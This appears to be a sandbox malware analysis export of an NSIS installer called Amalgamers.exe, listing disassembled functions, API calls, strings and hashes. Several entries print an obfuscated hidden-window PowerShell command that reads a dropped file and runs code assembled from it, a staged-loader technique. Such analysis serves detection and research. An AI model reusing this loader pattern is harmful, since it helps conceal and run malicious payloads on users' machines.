                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                        • String ID: Execute: $Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) "$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$powershell.exe -windowstyle hidden
                                        • API String ID: 717251189-2403248708
                                        • Opcode ID: 6fb7d4b9e0176c72f21e117460eb3ab44bee62ba2a965ffc372a20c4b8672acd
                                        • Instruction ID: 67ab450255a0c50706d08a2588864b7c9a920b8361f3652e316ab2a1c483ee89
                                        • Opcode Fuzzy Hash: 6fb7d4b9e0176c72f21e117460eb3ab44bee62ba2a965ffc372a20c4b8672acd
                                        • Instruction Fuzzy Hash: C661E375900105AEDB209F24CD84BBF7BA4AB15314F52413FEA03BA2D2C67C8962CB5D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 493 402f9c-402fb0 494 402fb2 493->494 495 402fb9-402fc2 493->495 494->495 496 402fc4 495->496 497 402fcb-402fd0 495->497 496->497 498 402fe0-402fed call 4031ae 497->498 499 402fd2-402fdb call 4031c4 497->499 503 402ff3-402ff7 498->503 504 40319c 498->504 499->498 505 403147-403149 503->505 506 402ffd-403046 GetTickCount 503->506 507 40319e-40319f 504->507 511 403189-40318c 505->511 512 40314b-40314e 505->512 508 4031a4 506->508 509 40304c-403054 506->509 510 4031a7-4031ab 507->510 508->510 513 403056 509->513 514 403059-403067 call 4031ae 509->514 515 403191-40319a call 4031ae 511->515 516 40318e 511->516 512->508 517 403150 512->517 513->514 514->504 526 40306d-403076 514->526 515->504 527 4031a1 515->527 516->515 520 403153-403159 517->520 521 40315b 520->521 522 40315d-40316b call 4031ae 520->522 521->522 522->504 530 40316d-403179 call 405be0 522->530 529 40307c-40309c call 40645d 526->529 527->508 535 4030a2-4030b5 GetTickCount 529->535 536 40313f-403141 529->536 537 403143-403145 530->537 538 40317b-403185 530->538 539 4030b7-4030bf 535->539 540 4030fa-4030fc 535->540 536->507 537->507 538->520 543 403187 538->543 544 4030c1-4030c5 539->544 545 4030c7-4030f2 MulDiv wsprintfA call 4050c7 539->545 541 403133-403137 540->541 542 4030fe-403102 540->542 541->509 548 40313d 541->548 546 403104-40310b call 405be0 542->546 547 403119-403124 542->547 543->508 544->540 544->545 552 4030f7 545->552 553 403110-403112 546->553 551 403127-40312b 547->551 548->508 551->529 554 403131 551->554 552->540 553->537 555 403114-403117 553->555 554->508 555->551
                                        APIs
                                        Strings
                                        • 9UA, xrefs: 00403070, 00403082
                                        • ... %d%%, xrefs: 004030DD
                                        • svrdlilje gogopigerne irresponsive frigoric,schferhunden uddelighedernes inspirer levodopa fintskaarnes exonerative buspassagerer interrelations bourgeoisies soldadoscalamumi parmigiana spoliated sekundovioliner stract inorthography jnedes,vandreaar magnat n, xrefs: 0040301D
                                        • (TA, xrefs: 0040315D
                                        • (TA, xrefs: 00403059
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: CountTick$wsprintf
                                        • String ID: (TA$(TA$... %d%%$9UA$svrdlilje gogopigerne irresponsive frigoric,schferhunden uddelighedernes inspirer levodopa fintskaarnes exonerative buspassagerer interrelations bourgeoisies soldadoscalamumi parmigiana spoliated sekundovioliner stract inorthography jnedes,vandreaar magnat n
                                        • API String ID: 551687249-2811085358
                                        • Opcode ID: 9cc729fb03587e77d36b85ec2d3e28e988b6cfa12a4048dcf9b453659f184ac0
                                        • Instruction ID: 5c281e24a88a3bae7ae2a550c5808c60fec2149314028a17d76778b6f2aa7d1b
                                        • Opcode Fuzzy Hash: 9cc729fb03587e77d36b85ec2d3e28e988b6cfa12a4048dcf9b453659f184ac0
                                        • Instruction Fuzzy Hash: BB518171900219DBDB00DF66DA4479E7BB8EF4875AF10453BE814BB2D0C7789E40CBA9

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 556 401759-40177c call 402acb call 4059a5 561 401786-401798 call 405fa0 call 405938 lstrcatA 556->561 562 40177e-401784 call 405fa0 556->562 567 40179d-4017a3 call 40620a 561->567 562->567 572 4017a8-4017ac 567->572 573 4017ae-4017b8 call 4062a3 572->573 574 4017df-4017e2 572->574 581 4017ca-4017dc 573->581 582 4017ba-4017c8 CompareFileTime 573->582 576 4017e4-4017e5 call 405b14 574->576 577 4017ea-401806 call 405b39 574->577 576->577 584 401808-40180b 577->584 585 40187e-4018a7 call 4050c7 call 402f9c 577->585 581->574 582->581 587 401860-40186a call 4050c7 584->587 588 40180d-40184f call 405fa0 * 2 call 405fc2 call 405fa0 call 4056bc 584->588 599 4018a9-4018ad 585->599 600 4018af-4018bb SetFileTime 585->600 597 401873-401879 587->597 588->572 620 401855-401856 588->620 601 402960 597->601 599->600 603 4018c1-4018cc CloseHandle 599->603 600->603 607 402962-402966 601->607 605 4018d2-4018d5 603->605 606 402957-40295a 603->606 609 4018d7-4018e8 call 405fc2 lstrcatA 605->609 610 4018ea-4018ed call 405fc2 605->610 606->601 614 4018f2-4022ec call 4056bc 609->614 610->614 614->606 614->607 620->597 622 401858-401859 620->622 622->587
                                        APIs
                                        • lstrcatA.KERNEL32(00000000,00000000,powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",C:\Users\user\AppData\Local\Reglements216\Fessewise,00000000,00000000,00000031), ref: 00401798
                                        • CompareFileTime.KERNEL32(-00000014,?,powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000,00000000,powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",C:\Users\user\AppData\Local\Reglements216\Fessewise,00000000,00000000,00000031), ref: 004017C2
                                          • Part of subcall function 00405FA0: lstrcpynA.KERNEL32(?,?,00000400,004032DE,Topfartens Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FAD
                                          • Part of subcall function 004050C7: lstrlenA.KERNEL32(Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000,004195D8,74DF23A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
                                          • Part of subcall function 004050C7: lstrlenA.KERNEL32(004030F7,Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000,004195D8,74DF23A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
                                          • Part of subcall function 004050C7: lstrcatA.KERNEL32(Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",004030F7,004030F7,Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000,004195D8,74DF23A0), ref: 00405123
                                          • Part of subcall function 004050C7: SetWindowTextA.USER32(Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) "), ref: 00405135
                                          • Part of subcall function 004050C7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
                                          • Part of subcall function 004050C7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
                                          • Part of subcall function 004050C7: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                        • String ID: C:\Users\user\AppData\Local\Reglements216\Fessewise$C:\Windows\Fonts\Flerried.asi$powershell.exe -windowstyle hidden$powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) "
                                        • API String ID: 1941528284-1811483683
                                        • Opcode ID: 314d660de66636c29a68347d349d4073d53d9a3baf3ac9617792df369dcc4375
                                        • Instruction ID: 9917b4e32c30e3d06e99a245a18197bb2030eb542a9362b48aff858cdbf0b6bf
                                        • Opcode Fuzzy Hash: 314d660de66636c29a68347d349d4073d53d9a3baf3ac9617792df369dcc4375
                                        • Instruction Fuzzy Hash: C541A571A00515BACF107BA5CD45EAF3678EF45368F60823FF421F20E1D67C8A418AAE

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 623 4050c7-4050dc 624 405192-405196 623->624 625 4050e2-4050f4 623->625 626 4050f6-4050fa call 405fc2 625->626 627 4050ff-40510b lstrlenA 625->627 626->627 629 405128-40512c 627->629 630 40510d-40511d lstrlenA 627->630 631 40513b-40513f 629->631 632 40512e-405135 SetWindowTextA 629->632 630->624 633 40511f-405123 lstrcatA 630->633 634 405141-405183 SendMessageA * 3 631->634 635 405185-405187 631->635 632->631 633->629 634->635 635->624 636 405189-40518c 635->636 636->624
                                        APIs
                                        • lstrlenA.KERNEL32(Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000,004195D8,74DF23A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
                                        • lstrlenA.KERNEL32(004030F7,Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000,004195D8,74DF23A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
                                        • lstrcatA.KERNEL32(Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",004030F7,004030F7,Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000,004195D8,74DF23A0), ref: 00405123
                                        • SetWindowTextA.USER32(Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) "), ref: 00405135
                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183
                                        Strings
                                        • Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ", xrefs: 004050E7, 004050F9, 004050FF, 00405122, 0040512E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                        • String ID: Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) "
                                        • API String ID: 2531174081-3634379012
                                        • Opcode ID: df169b469795bd748155a1bed2d77fa091380b27c3cf4036283bd74b1758659f
                                        • Instruction ID: 4d1d9eb5ffa78b07b8376cbf0c4e91ada4ce3c5a86d4cc872ddc87c593067670
                                        • Opcode Fuzzy Hash: df169b469795bd748155a1bed2d77fa091380b27c3cf4036283bd74b1758659f
                                        • Instruction Fuzzy Hash: 69214A71900518BADB119FA5CD84A9FBFA9EB09354F14807AF944AA291C7398E418F98

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 637 4062ca-4062ea GetSystemDirectoryA 638 4062ec 637->638 639 4062ee-4062f0 637->639 638->639 640 406300-406302 639->640 641 4062f2-4062fa 639->641 643 406303-406335 wsprintfA LoadLibraryExA 640->643 641->640 642 4062fc-4062fe 641->642 642->643
                                        APIs
                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062E1
                                        • wsprintfA.USER32 ref: 0040631A
                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040632E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                        • String ID: %s%s.dll$UXTHEME$\
                                        • API String ID: 2200240437-4240819195
                                        • Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                        • Instruction ID: 4b2e1b96e526c3afc1937c3159904a09e8452480974eeaf1dbd8ebd71d3b02b5
                                        • Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                        • Instruction Fuzzy Hash: 87F0F63050060AABEB14AB74DD0DFEB375CAB08305F14047AAA87E11C1EA78D9398B9C

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 644 405b68-405b72 645 405b73-405b9e GetTickCount GetTempFileNameA 644->645 646 405ba0-405ba2 645->646 647 405bad-405baf 645->647 646->645 648 405ba4 646->648 649 405ba7-405baa 647->649 648->649
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00405B7C
                                        • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B96
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B6B
                                        • "C:\Users\user\Desktop\Amalgamers.exe", xrefs: 00405B68
                                        • nsa, xrefs: 00405B73
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: CountFileNameTempTick
                                        • String ID: "C:\Users\user\Desktop\Amalgamers.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                        • API String ID: 1716503409-3913210336
                                        • Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                        • Instruction ID: 343f4ea9f9204f9b983ce224a42535e265f7560d01468737dbca66c928219fc6
                                        • Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                        • Instruction Fuzzy Hash: 59F0A7363082087BDB108F56DD04B9B7BADDF91750F10803BFA48DB290D6B4E9548B58

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 650 4015bb-4015ce call 402acb call 4059d1 655 4015d0-4015e3 call 405963 650->655 656 401624-401627 650->656 663 4015e5-4015e8 655->663 664 4015fb-4015fc call 40560a 655->664 657 401652-402242 call 401423 656->657 658 401629-401644 call 401423 call 405fa0 SetCurrentDirectoryA 656->658 673 402957-402966 657->673 674 40271c-402723 657->674 658->673 677 40164a-40164d 658->677 663->664 667 4015ea-4015f1 call 405627 663->667 675 401601-401603 664->675 667->664 681 4015f3-4015f9 call 40558d 667->681 674->673 678 401605-40160a 675->678 679 40161a-401622 675->679 677->673 682 401617 678->682 683 40160c-401615 GetFileAttributesA 678->683 679->655 679->656 681->675 682->679 683->679 683->682
                                        APIs
                                          • Part of subcall function 004059D1: CharNextA.USER32(?,?,0042BC78,?,00405A3D,0042BC78,0042BC78,74DF3410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059DF
                                          • Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059E4
                                          • Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059F8
                                        • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                          • Part of subcall function 0040558D: CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004055D0
                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Reglements216\Fessewise,00000000,00000000,000000F0), ref: 0040163C
                                        Strings
                                        • C:\Users\user\AppData\Local\Reglements216\Fessewise, xrefs: 00401631
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                        • String ID: C:\Users\user\AppData\Local\Reglements216\Fessewise
                                        • API String ID: 1892508949-2812723231
                                        • Opcode ID: 906da369be0d39d3f7caf60511ffc24c4b77757406bd8c2e1d0cca4ec0646839
                                        • Instruction ID: df45c6993d6bc62f872b04d9318ddfa5d1dc0af5cd0ca16cddc76749c9d8dee7
                                        • Opcode Fuzzy Hash: 906da369be0d39d3f7caf60511ffc24c4b77757406bd8c2e1d0cca4ec0646839
                                        • Instruction Fuzzy Hash: B6112731608152EBCF217BB54D419BF66B0DA92324F68093FE5D1B22E2D63D49439A3F

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 687 40563f-405670 CreateProcessA 688 405672-40567b CloseHandle 687->688 689 40567e-40567f 687->689 688->689
                                        APIs
                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C078,Error launching installer), ref: 00405668
                                        • CloseHandle.KERNEL32(?), ref: 00405675
                                        Strings
                                        • Error launching installer, xrefs: 00405652
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: CloseCreateHandleProcess
                                        • String ID: Error launching installer
                                        • API String ID: 3712363035-66219284
                                        • Opcode ID: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
                                        • Instruction ID: cd0db04dc70eb2db95c0507bc2818c98f3fa4352d1ad4fdf37015ca79918bc5c
                                        • Opcode Fuzzy Hash: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
                                        • Instruction Fuzzy Hash: 2FE046F0640209BFEB109FB0EE49F7F7AADEB00704F404561BD00F2190EA7498088A7C

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 690 4023d6-4023fd call 402acb * 2 call 402b5b 696 402402-402407 690->696 697 402957-402966 696->697 698 40240d-402417 696->698 699 402427-40242a 698->699 700 402419-402426 call 402acb lstrlenA 698->700 703 40242c-40243d call 402aa9 699->703 704 40243e-402441 699->704 700->699 703->704 708 402452-402466 RegSetValueExA 704->708 709 402443-40244d call 402f9c 704->709 712 402468 708->712 713 40246b-402548 RegCloseKey 708->713 709->708 712->713 713->697 715 40271c-402723 713->715 715->697
                                        APIs
                                        • lstrlenA.KERNEL32(0040AC18,00000023,00000011,00000002), ref: 00402421
                                        • RegSetValueExA.ADVAPI32(?,?,?,?,0040AC18,00000000,00000011,00000002), ref: 0040245E
                                        • RegCloseKey.ADVAPI32(?,?,?,0040AC18,00000000,00000011,00000002), ref: 00402542
                                        Memory Dump Source
